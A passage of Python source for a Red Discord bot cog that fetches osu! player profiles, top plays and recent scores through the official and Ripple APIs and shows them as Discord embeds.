\"ctb\", \"mania\"]\r\n\r\nlog = logging.getLogger(\"red.osu\")\r\nlog.setLevel(logging.INFO)\r\n\r\nclass Osu:\r\n \"\"\"Cog to give osu! 
stats for all gamemodes.\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.osu_api_key = fileIO(\"data/osu/apikey.json\", \"load\")\r\n self.user_settings = fileIO(\"data/osu/user_settings.json\", \"load\")\r\n self.track = fileIO(\"data/osu/track.json\", \"load\")\r\n self.osu_settings = fileIO(\"data/osu/osu_settings.json\", \"load\")\r\n self.num_max_prof = 8\r\n self.max_map_disp = 3\r\n\r\n # ---------------------------- Settings ------------------------------------\r\n @commands.group(pass_context=True)\r\n async def osuset(self, ctx):\r\n \"\"\"Where you can define some settings\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n return\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def tracktop(self, ctx, top_num:int):\r\n \"\"\" Set # of top plays being tracked \"\"\"\r\n msg = \"\"\r\n if top_num < 1 or top_num > 100:\r\n msg = \"**Please enter a valid number. (1 - 100)**\"\r\n else:\r\n self.osu_settings[\"num_track\"] = top_num\r\n msg = \"**Now tracking Top {} Plays.**\".format(top_num)\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(msg)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def displaytop(self, ctx, top_num:int):\r\n \"\"\" Set # of best plays being displayed in top command \"\"\"\r\n msg = \"\"\r\n if top_num < 1 or top_num > 10:\r\n msg = \"**Please enter a valid number. (1 - 10)**\"\r\n else:\r\n self.osu_settings[\"num_best_plays\"] = top_num\r\n msg = \"**Now Displaying Top {} Plays.**\".format(top_num)\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(msg)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.serverowner_or_permissions(administrator=True)\r\n async def tracking(self, ctx, toggle=None):\r\n \"\"\" For disabling tracking on server (enable/disable) \"\"\"\r\n server = ctx.message.server\r\n\r\n if server.id not in self.osu_settings:\r\n self.osu_settings[server.id] = {}\r\n self.osu_settings[server.id][\"tracking\"] = True\r\n\r\n status = \"\"\r\n if not toggle:\r\n self.osu_settings[server.id][\"tracking\"] = not self.osu_settings[server.id][\"tracking\"]\r\n if self.osu_settings[server.id][\"tracking\"]:\r\n status = \"Enabled\"\r\n else:\r\n status = \"Disabled\"\r\n elif toggle.lower() == \"enable\":\r\n self.osu_settings[server.id][\"tracking\"] = True\r\n status = \"Enabled\"\r\n elif toggle.lower() == \"disable\":\r\n self.osu_settings[server.id][\"tracking\"] = False\r\n status = \"Disabled\"\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(\"**Player Tracking {} on {}.**\".format(server.name, status))\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def overview(self, ctx):\r\n \"\"\" Get an overview of your settings \"\"\"\r\n server = ctx.message.server\r\n user = ctx.message.author\r\n\r\n em = discord.Embed(description='', colour=user.colour)\r\n em.set_author(name=\"Current Settings for {}\".format(server.name), icon_url = server.icon_url)\r\n\r\n # determine api to use\r\n if server.id in self.osu_settings and \"api\" in self.osu_settings[server.id]:\r\n if self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"default\"]:\r\n api = \"Official Osu! 
API\"\r\n elif self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"ripple\"]:\r\n api = \"Ripple API\"\r\n else:\r\n api = \"Official Osu! API\"\r\n\r\n # determine\r\n if server.id not in self.osu_settings or \"tracking\" not in self.osu_settings[server.id] or self.osu_settings[server.id][\"tracking\"] == True:\r\n tracking = \"Enabled\"\r\n else:\r\n tracking = \"Disabled\"\r\n\r\n info = \"\"\r\n info += \"**▸ Default API:** {}\\n\".format(api)\r\n info += \"**▸ Tracking:** {}\\n\".format(tracking)\r\n\r\n if tracking == \"Enabled\":\r\n info += \"**▸ Tracking Number:** {}\\n\".format(self.osu_settings['num_track'])\r\n info += \"**▸ Top Plays:** {}\".format(self.osu_settings['num_best_plays'])\r\n\r\n em.description = info\r\n await self.bot.say(embed = em)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def api(self, ctx, *, choice):\r\n \"\"\"'official' or 'ripple'\"\"\"\r\n server = ctx.message.server\r\n if server.id not in self.osu_settings:\r\n self.osu_settings[server.id] = {}\r\n\r\n if not choice.lower() == \"official\" and not choice.lower() == \"ripple\":\r\n await self.bot.say(\"The two choices are `official` and `ripple`\")\r\n return\r\n elif choice.lower() == \"official\":\r\n self.osu_settings[server.id][\"api\"] = self.osu_settings[\"type\"][\"default\"]\r\n elif choice.lower() == \"ripple\":\r\n self.osu_settings[server.id][\"api\"] = self.osu_settings[\"type\"][\"ripple\"]\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(\"**Switched to `{}` server as default on `{}`.** :arrows_counterclockwise:\".format(choice, server.name))\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n async def default(self, ctx, mode:str):\r\n \"\"\" Set your default gamemode \"\"\"\r\n user = ctx.message.author\r\n server = ctx.message.server\r\n\r\n if mode.lower() in modes:\r\n gamemode = modes.index(mode.lower())\r\n elif int(mode) >= 0 and int(mode) <= 3:\r\n gamemode = int(mode)\r\n else:\r\n await self.bot.say(\"**Please enter a valid gamemode.**\")\r\n return\r\n\r\n if user.id in self.user_settings:\r\n self.user_settings[user.id]['default_gamemode'] = int(gamemode)\r\n await self.bot.say(\"**`{}`'s default gamemode has been set to `{}`.** :white_check_mark:\".format(user.name, modes[gamemode]))\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n else:\r\n await self.bot.say(help_msg[1])\r\n\r\n @commands.group(pass_context=True)\r\n async def osutrack(self, ctx):\r\n \"\"\"Where you can define some settings\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n return\r\n\r\n @osuset.command(pass_context=True)\r\n @checks.is_owner()\r\n async def key(self, ctx):\r\n \"\"\"Sets your osu api key\"\"\"\r\n await self.bot.whisper(\"Type your osu! api key. You can reply here.\")\r\n key = await self.bot.wait_for_message(timeout=30, author=ctx.message.author)\r\n if key is None:\r\n return\r\n else:\r\n self.osu_api_key[\"osu_api_key\"] = key.content\r\n fileIO(\"data/osu/apikey.json\", \"save\", self.osu_api_key)\r\n await self.bot.whisper(\"API Key details added. :white_check_mark:\")\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def osu(self, ctx, *username):\r\n \"\"\"Gives osu user(s) stats. 
Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 0)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def osutop(self, ctx, *username):\r\n \"\"\"Gives top osu plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 0)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def taiko(self, ctx, *username):\r\n \"\"\"Gives taiko user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 1)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def taikotop(self, ctx, *username):\r\n \"\"\"Gives top taiko plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 1)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def ctb(self, ctx, *username):\r\n \"\"\"Gives ctb user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 2)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def ctbtop(self, ctx, *username):\r\n \"\"\"Gives ctb osu plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 2)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def mania(self, ctx, *username):\r\n \"\"\"Gives mania user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 3)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def maniatop(self, ctx, *username):\r\n \"\"\"Gives top mania plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 3)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def recent(self, ctx, *username):\r\n \"\"\"Gives recent plays of player with respect to user's default gamemode. [p]recent [username] (gamemode:optional)\"\"\"\r\n await self._process_user_recent(ctx, username)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n async def user(self, ctx, *, username):\r\n \"\"\"Sets user information given an osu! username\"\"\"\r\n user = ctx.message.author\r\n channel = ctx.message.channel\r\n server = user.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if user.server.id not in self.user_settings:\r\n self.user_settings[user.server.id] = {}\r\n\r\n if not self._check_user_exists(user):\r\n try:\r\n osu_user = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 1))\r\n newuser = {\r\n \"discord_username\": user.name,\r\n \"osu_username\": username,\r\n \"osu_user_id\": osu_user[0][\"user_id\"],\r\n \"default_gamemode\": 0,\r\n \"ripple_username\": \"\"\r\n }\r\n\r\n self.user_settings[user.id] = newuser\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n await self.bot.say(\"{}, your account has been linked to osu! username `{}`\".format(user.mention, osu_user[0][\"username\"]))\r\n except:\r\n await self.bot.say(\"{} doesn't exist in the osu! database.\".format(username))\r\n else:\r\n try:\r\n osu_user = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 1))\r\n self.user_settings[user.id][\"osu_username\"] = username\r\n self.user_settings[user.id][\"osu_user_id\"] = osu_user[0][\"user_id\"]\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n await self.bot.say(\"{}, your osu! 
username has been edited to `{}`\".format(user.mention, osu_user[0][\"username\"]))\r\n except:\r\n await self.bot.say(\"{} doesn't exist in the osu! database.\".format(username))\r\n\r\n # Gets json information to proccess the small version of the image\r\n async def _process_user_info(self, ctx, usernames, gamemode:int):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n if not usernames:\r\n usernames = [None]\r\n # get rid of duplicates\r\n usernames = list(set(usernames))\r\n\r\n # determine api to use\r\n usernames, api = self._determine_api(server, usernames)\r\n\r\n # gives the final input for osu username\r\n final_usernames = []\r\n for username in usernames:\r\n test_username = await self._process_username(ctx, username)\r\n if test_username != None:\r\n final_usernames.append(test_username)\r\n\r\n # testing if username is osu username\r\n all_user_info = []\r\n sequence = []\r\n\r\n count_valid = 0\r\n for i in range(len(final_usernames)):\r\n userinfo = list(await get_user(key, api, final_usernames[i], gamemode)) # get user info from osu api\r\n if userinfo != None and len(userinfo) > 0 and userinfo[0]['pp_raw'] != None:\r\n all_user_info.append(userinfo[0])\r\n sequence.append((count_valid, int(userinfo[0][\"pp_rank\"])))\r\n count_valid = count_valid + 1\r\n else:\r\n await self.bot.say(\"**`{}` has not played enough.**\".format(final_usernames[i]))\r\n\r\n sequence = sorted(sequence, key=operator.itemgetter(1))\r\n\r\n all_players = []\r\n for i, pp in sequence:\r\n all_players.append(await self._get_user_info(api, server, user, all_user_info[i], gamemode))\r\n\r\n disp_num = min(self.num_max_prof, len(all_players))\r\n if disp_num < len(all_players):\r\n await self.bot.say(\"Found {} users, but displaying top {}.\".format(len(all_players), disp_num))\r\n\r\n for player in all_players[0:disp_num]:\r\n await self.bot.say(embed=player)\r\n\r\n # takes iterable of inputs and determines api, also based on defaults\r\n def _determine_api(self, server, inputs):\r\n if not inputs or ('-ripple' not in inputs and '-official' not in inputs): # in case not specified\r\n if server.id in self.osu_settings and \"api\" in self.osu_settings[server.id]:\r\n if self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"default\"]:\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n elif self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"ripple\"]:\r\n api = self.osu_settings[\"type\"][\"ripple\"]\r\n else:\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n elif '-ripple' in inputs:\r\n inputs = list(inputs)\r\n inputs.remove('-ripple')\r\n api = self.osu_settings[\"type\"][\"ripple\"]\r\n elif '-official' in inputs:\r\n inputs = list(inputs)\r\n inputs.remove('-official')\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n\r\n if not inputs:\r\n inputs = [None]\r\n\r\n return inputs, api\r\n\r\n # Gets the user's most recent score\r\n async def _process_user_recent(self, ctx, inputs):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n # forced handle gamemode\r\n gamemode = -1\r\n inputs = list(inputs)\r\n for mode in modes:\r\n if len(inputs) >= 2 and mode in inputs:\r\n gamemode = self._get_gamemode_number(mode)\r\n inputs.remove(mode)\r\n elif len(inputs) == 1 and mode == inputs[0]:\r\n gamemode = self._get_gamemode_number(mode)\r\n inputs.remove(mode)\r\n inputs = 
tuple(inputs)\r\n\r\n # handle api and username (1)\r\n username, api = self._determine_api(server, list(inputs))\r\n username = username[0]\r\n\r\n # gives the final input for osu username\r\n test_username = await self._process_username(ctx, username)\r\n if test_username:\r\n username = test_username\r\n else:\r\n return\r\n\r\n # determines which recent gamemode to display based on user\r\n if gamemode == -1:\r\n target_id = self._get_discord_id(username, api)\r\n if target_id != -1:\r\n gamemode = self.user_settings[target_id]['default_gamemode']\r\n elif target_id == -1 and self._check_user_exists(user):\r\n gamemode = self.user_settings[user.id]['default_gamemode']\r\n else:\r\n gamemode = 0\r\n\r\n # get userinfo\r\n userinfo = list(await get_user(key, api, username, gamemode))\r\n userrecent = list(await get_user_recent(key, api, username, gamemode))\r\n if not userinfo or not userrecent:\r\n await self.bot.say(\"**`{}` was not found or no recent plays in `{}`.**\".format(username, self._get_gamemode(gamemode)))\r\n return\r\n else:\r\n userinfo = userinfo[0]\r\n userrecent = userrecent[0]\r\n msg, recent_play = await self._get_recent(ctx, api, userinfo, userrecent, gamemode)\r\n await self.bot.say(msg, embed=recent_play)\r\n\r\n def _get_discord_id(self, username:str, api:str):\r\n #if api == self.osu_settings[\"type\"][\"ripple\"]:\r\n #name_type = \"ripple_username\"\r\n #else:\r\n #name_type = \"osu_username\"\r\n # currently assumes same name\r\n name_type = \"osu_username\"\r\n\r\n for user_id in self.user_settings.keys():\r\n if self.user_settings[user_id] and username in self.user_settings[user_id][name_type]:\r\n return user_id\r\n return -1\r\n\r\n # Gets information to proccess the top play version of the image\r\n async def _process_user_top(self, ctx, username, gamemode: int):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n # determine api to use\r\n username, api = self._determine_api(server, list(username))\r\n username = username[0]\r\n\r\n # gives the final input for osu username\r\n test_username = await self._process_username(ctx, username)\r\n if test_username:\r\n username = test_username\r\n else:\r\n return\r\n\r\n # get userinfo\r\n userinfo = list(await get_user(key, api, username, gamemode))\r\n userbest = list(await get_user_best(key, api, username, gamemode, self.osu_settings['num_best_plays']))\r\n if userinfo and userbest:\r\n msg, top_plays = await self._get_user_top(ctx, api, userinfo[0], userbest, gamemode)\r\n await self.bot.say(msg, embed=top_plays)\r\n else:\r\n await self.bot.say(\"**`{}` was not found or not enough plays.**\".format(username))\r\n\r\n ## processes username. probably the worst chunck of code in this project so far. will fix/clean later\r\n async def _process_username(self, ctx, username):\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n # if nothing is given, must rely on if there's account\r\n if not username:\r\n if self._check_user_exists(user):\r\n username = self.user_settings[user.id][\"osu_username\"]\r\n else:\r\n await self.bot.say(\"It doesn't seem that you have an account linked. 
Do **{}osuset user [username]**.\".format(prefix))\r\n return None # bad practice, but too lazy to make it nice\r\n # if it's a discord user, first check to see if they are in database and choose that username\r\n # then see if the discord username is a osu username, then try the string itself\r\n elif find(lambda m: m.name == username, channel.server.members) is not None:\r\n target = find(lambda m: m.name == username, channel.server.members)\r\n try:\r\n self._check_user_exists(target)\r\n username = self.user_settings[target.id][\"osu_username\"]\r\n except:\r\n if await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 0):\r\n username = str(target)\r\n else:\r\n await self.bot.say(help_msg[1])\r\n return\r\n # @ implies its a discord user (if not, it will just say user not found in the next section)\r\n # if not found, then oh well.\r\n elif \"@\" in username:\r\n user_id = re.findall(\"\\d+\", username)\r\n user_id = user_id[0]\r\n if user_id in self.user_settings:\r\n username = self.user_settings[user_id][\"osu_username\"]\r\n else:\r\n await self.bot.say(help_msg[1])\r\n return\r\n else:\r\n username = str(username)\r\n\r\n return username\r\n\r\n # Checks if user exists\r\n def _check_user_exists(self, user):\r\n if user.id not in self.user_settings:\r\n return False\r\n return True\r\n\r\n def _get_api_name(self, url:str):\r\n if url == self.osu_settings[\"type\"][\"ripple\"]:\r\n return \"Ripple\"\r\n else:\r\n return \"Official\"\r\n\r\n # Gives a small user profile\r\n async def _get_user_info(self, api:str, server, server_user, user, gamemode: int):\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url ='http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n pp_country_rank = \" ({}#{})\".format(user['country'], user['pp_country_rank'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n pp_country_rank = \"\"\r\n\r\n flag_url = 'https://new.ppy.sh//images/flags/{}.png'.format(user['country'])\r\n\r\n gamemode_text = self._get_gamemode(gamemode)\r\n\r\n try:\r\n user_url = 'https://{}/u/{}'.format(api, user['user_id'])\r\n em = discord.Embed(description='', colour=server_user.colour)\r\n em.set_author(name=\"{} Profile for {}\".format(gamemode_text, user['username']), icon_url = flag_url, url = user_url)\r\n em.set_thumbnail(url=profile_url)\r\n level_int = int(float(user['level']))\r\n level_percent = float(user['level']) - level_int\r\n\r\n info = \"\"\r\n info += \"**▸ {} Rank:** #{} {}\\n\".format(self._get_api_name(api), user['pp_rank'], pp_country_rank)\r\n info += \"**▸ Level:** {} ({:.2f}%)\\n\".format(level_int, level_percent*100)\r\n info += \"**▸ Total PP:** {}\\n\".format(user['pp_raw'])\r\n info += \"**▸ Playcount:** {}\\n\".format(user['playcount'])\r\n info += \"**▸ Hit Accuracy:** {}%\".format(user['accuracy'][0:5])\r\n em.description = info\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n soup = BeautifulSoup(urllib.request.urlopen(\"https://osu.ppy.sh/u/{}\".format(user['user_id'])), \"html.parser\")\r\n timestamps = []\r\n for tag in soup.findAll(attrs={'class': 'timeago'}):\r\n timestamps.append(datetime.datetime.strptime(tag.contents[0].strip().replace(\" UTC\", \"\"), '%Y-%m-%d %H:%M:%S'))\r\n timeago = datetime.datetime(1,1,1) + (datetime.datetime.utcnow() - timestamps[1])\r\n time_ago = \"Last Online \"\r\n if timeago.year-1 != 0:\r\n time_ago += \"{} Years \".format(timeago.year-1)\r\n if timeago.month-1 !=0:\r\n time_ago += 
\"{} Months \".format(timeago.month-1)\r\n if timeago.day-1 !=0:\r\n time_ago += \"{} Days \".format(timeago.day-1)\r\n if timeago.hour != 0:\r\n time_ago += \"{} Hours \".format(timeago.hour)\r\n if timeago.minute != 0:\r\n time_ago += \"{} Minutes \".format(timeago.minute)\r\n time_ago += \"{} Seconds ago\".format(timeago.second)\r\n em.set_footer(text=time_ago)\r\n return em\r\n except:\r\n return None\r\n\r\n async def _get_recent(self, ctx, api, user, userrecent, gamemode:int):\r\n server_user = ctx.message.author\r\n server = ctx.message.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n\r\n flag_url = 'https://new.ppy.sh//images/flags/{}.png'.format(user['country'])\r\n\r\n # get best plays map information and scores\r\n beatmap = list(await get_beatmap(key, api, beatmap_id=userrecent['beatmap_id']))[0]\r\n if not userrecent:\r\n return (\"**No recent score for `{}` in user's default gamemode (`{}`)**\".format(user['username'], self._get_gamemode(gamemode)), None)\r\n acc = self.calculate_acc(userrecent, gamemode)\r\n mods = self.mod_calculation(userrecent['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(beatmap['beatmap_id'])\r\n\r\n msg = \"**Most Recent {} Play for {}:**\".format(self._get_gamemode(gamemode), user['username'])\r\n\r\n info = \"\"\r\n info += \"▸ **Rank:** {} ▸ **Combo:** x{}\\n\".format(userrecent['rank'], userrecent['maxcombo'])\r\n info += \"▸ **Score:** {} ▸ **Misses:** {}\\n\".format(userrecent['score'], userrecent['countmiss'])\r\n info += \"▸ **Acc:** {:.2f}% ▸ **Stars:** {:.2f}★\\n\".format(float(acc), float(beatmap['difficultyrating']))\r\n\r\n # grab beatmap image\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0]).replace(\" \",\"%\")\r\n\r\n em = discord.Embed(description=info, colour=server_user.colour)\r\n em.set_author(name=\"{} [{}] +{}\".format(beatmap['title'], beatmap['version'], \",\".join(mods)), url = beatmap_url, icon_url = profile_url)\r\n em.set_thumbnail(url=map_image_url)\r\n em.set_footer(text = \"{} On Osu! 
{} Server\".format(userrecent['date'], self._get_api_name(api)))\r\n return (msg, em)\r\n\r\n # Gives a user profile image with some information\r\n async def _get_user_top(self, ctx, api, user, userbest, gamemode:int):\r\n server_user = ctx.message.author\r\n server = ctx.message.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n\r\n gamemode_text = self._get_gamemode(gamemode)\r\n\r\n # get best plays map information and scores\r\n best_beatmaps = []\r\n best_acc = []\r\n for i in range(self.osu_settings['num_best_plays']):\r\n beatmap = list(await get_beatmap(key, api, beatmap_id=userbest[i]['beatmap_id']))[0]\r\n score = list(await get_scores(key, api, userbest[i]['beatmap_id'], user['user_id'], gamemode))[0]\r\n best_beatmaps.append(beatmap)\r\n best_acc.append(self.calculate_acc(score,gamemode))\r\n\r\n all_plays = []\r\n msg = \"**Top {} {} Plays for {}:**\".format(self.osu_settings['num_best_plays'], gamemode_text, user['username'])\r\n desc = ''\r\n for i in range(self.osu_settings['num_best_plays']):\r\n mods = self.mod_calculation(userbest[i]['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(best_beatmaps[i]['beatmap_id'])\r\n\r\n info = ''\r\n info += '***{}. [__{} [{}]__]({}) +{}\\n***'.format(i+1, best_beatmaps[i]['title'], best_beatmaps[i]['version'], beatmap_url, ','.join(mods))\r\n info += '▸ **Rank:** {} ▸ **PP:** {:.2f}\\n'.format(userbest[i]['rank'], float(userbest[i]['pp']))\r\n info += '▸ **Score:** {} ▸ **Combo:** x{}\\n'.format(userbest[i]['score'], userbest[i]['maxcombo'])\r\n info += '▸ **Acc:** {:.2f}% ▸ **Stars:** {:.2f}★\\n\\n'.format(float(best_acc[i]), float(best_beatmaps[i]['difficultyrating']))\r\n desc += info\r\n em = discord.Embed(description=desc, colour=server_user.colour)\r\n em.set_footer(text = \"On Osu! {} Server\".format(self._get_api_name(api)))\r\n em.set_thumbnail(url=profile_url)\r\n\r\n return (msg, em)\r\n\r\n def _get_gamemode(self, gamemode:int):\r\n if gamemode == 1:\r\n gamemode_text = \"Taiko\"\r\n elif gamemode == 2:\r\n gamemode_text = \"Catch the Beat!\"\r\n elif gamemode == 3:\r\n gamemode_text = \"Osu! Mania\"\r\n else:\r\n gamemode_text = \"Osu! Standard\"\r\n return gamemode_text\r\n\r\n def _get_gamemode_display(self, gamemode):\r\n if gamemode == \"osu\":\r\n gamemode_text = \"Osu! Standard\"\r\n elif gamemode == \"ctb\":\r\n gamemode_text = \"Catch the Beat!\"\r\n elif gamemode == \"mania\":\r\n gamemode_text = \"Osu! 
Mania\"\r\n elif gamemode == \"taiko\":\r\n gamemode_text = \"Taiko\"\r\n return gamemode_text\r\n\r\n def _get_gamemode_number(self, gamemode:str):\r\n if gamemode == \"taiko\":\r\n gamemode_text = 1\r\n elif gamemode == \"ctb\":\r\n gamemode_text = 2\r\n elif gamemode == \"mania\":\r\n gamemode_text = 3\r\n else:\r\n gamemode_text = 0\r\n return int(gamemode_text)\r\n\r\n def calculate_acc(self, beatmap, gamemode:int):\r\n if gamemode == 0:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *=300\r\n user_score = float(beatmap['count300']) * 300.0\r\n user_score += float(beatmap['count100']) * 100.0\r\n user_score += float(beatmap['count50']) * 50.0\r\n elif gamemode == 1:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *= 300\r\n user_score = float(beatmap['count300']) * 1.0\r\n user_score += float(beatmap['count100']) * 0.5\r\n user_score *= 300\r\n elif gamemode == 2:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score += float(beatmap['countkatu'])\r\n user_score = float(beatmap['count300'])\r\n user_score += float(beatmap['count100'])\r\n user_score += float(beatmap['count50'])\r\n elif gamemode == 3:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['countgeki'])\r\n total_unscale_score += float(beatmap['countkatu'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *=300\r\n user_score = float(beatmap['count300']) * 300.0\r\n user_score += float(beatmap['countgeki']) * 300.0\r\n user_score += float(beatmap['countkatu']) * 200.0\r\n user_score += float(beatmap['count100']) * 100.0\r\n user_score += float(beatmap['count50']) * 50.0\r\n\r\n return (float(user_score)/float(total_unscale_score)) * 100.0\r\n\r\n # Truncates the text because some titles/versions are too long\r\n def truncate_text(self, text):\r\n if len(text) > 20:\r\n text = text[0:20] + '...'\r\n return text\r\n\r\n # gives a list of the ranked mods given a peppy number lol\r\n def mod_calculation(self, number):\r\n number = int(number)\r\n mod_list = []\r\n mods = ['PF', 'SO', 'FL', 'NC', 'HT', 'RX', 'DT', 'SD', 'HR', 'HD', 'EZ', 'NF']\r\n peppyNumbers = [16384, 4096, 1024, 576, 256, 128, 64, 32, 16, 8, 2, 1]\r\n\r\n for i in range(len(mods)):\r\n if number >= peppyNumbers[i]:\r\n number-= peppyNumbers[i]\r\n mod_list.append(mods[i])\r\n return mod_list\r\n\r\n # ---------------------------- Detect Links ------------------------------\r\n # called by listener\r\n async def find_link(self, message):\r\n if message.author.id == self.bot.user.id:\r\n return\r\n\r\n if \"https://\" in message.content:\r\n # process the the idea from a url in msg\r\n all_urls = []\r\n original_message = message.content\r\n get_urls = re.findall(\"(https:\\/\\/[^\\s]+)([ ]\\+[A-Za-z][^\\s]+)?\", original_message)\r\n\r\n for url in get_urls:\r\n all_urls.append(url[0])\r\n\r\n # get rid of duplicates\r\n all_urls = list(set(all_urls))\r\n\r\n if 
'https://osu.ppy.sh/u/' in original_message:\r\n await self.process_user_url(all_urls, message)\r\n\r\n if 'https://osu.ppy.sh/s/' in original_message or 'https://osu.ppy.sh/b/' in original_message:\r\n await self.process_beatmap(all_urls, message)\r\n\r\n # processes user input for user profile link\r\n async def process_user_url(self, all_urls, message):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n server_user = message.author\r\n server = message.author.server\r\n\r\n for url in all_urls:\r\n try:\r\n if url.find('https://osu.ppy.sh/u/') != -1:\r\n user_id = url.replace('https://osu.ppy.sh/u/','')\r\n user_info = await get_user(key, self.osu_settings[\"type\"][\"default\"], user_id, 0)\r\n if user_id in self.user_settings:\r\n gamemode = self.user_settings[user_id][\"default_gamemode\"]\r\n else:\r\n gamemode = 0\r\n em = await self._get_user_info(self.osu_settings[\"type\"][\"default\"], server, server_user, user_info[0], gamemode)\r\n await self.bot.send_message(message.channel, embed = em)\r\n except:\r\n await self.bot.send_message(message.channel, \"That user doesn't exist.\")\r\n\r\n # processes user input for the beatmap\r\n async def process_beatmap(self, all_urls, message):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n for url in all_urls:\r\n try:\r\n if url.find('https://osu.ppy.sh/s/') != -1:\r\n beatmap_id = url.replace('https://osu.ppy.sh/s/','')\r\n beatmap_info = await get_beatmapset(key, self.osu_settings[\"type\"][\"default\"], beatmap_id)\r\n 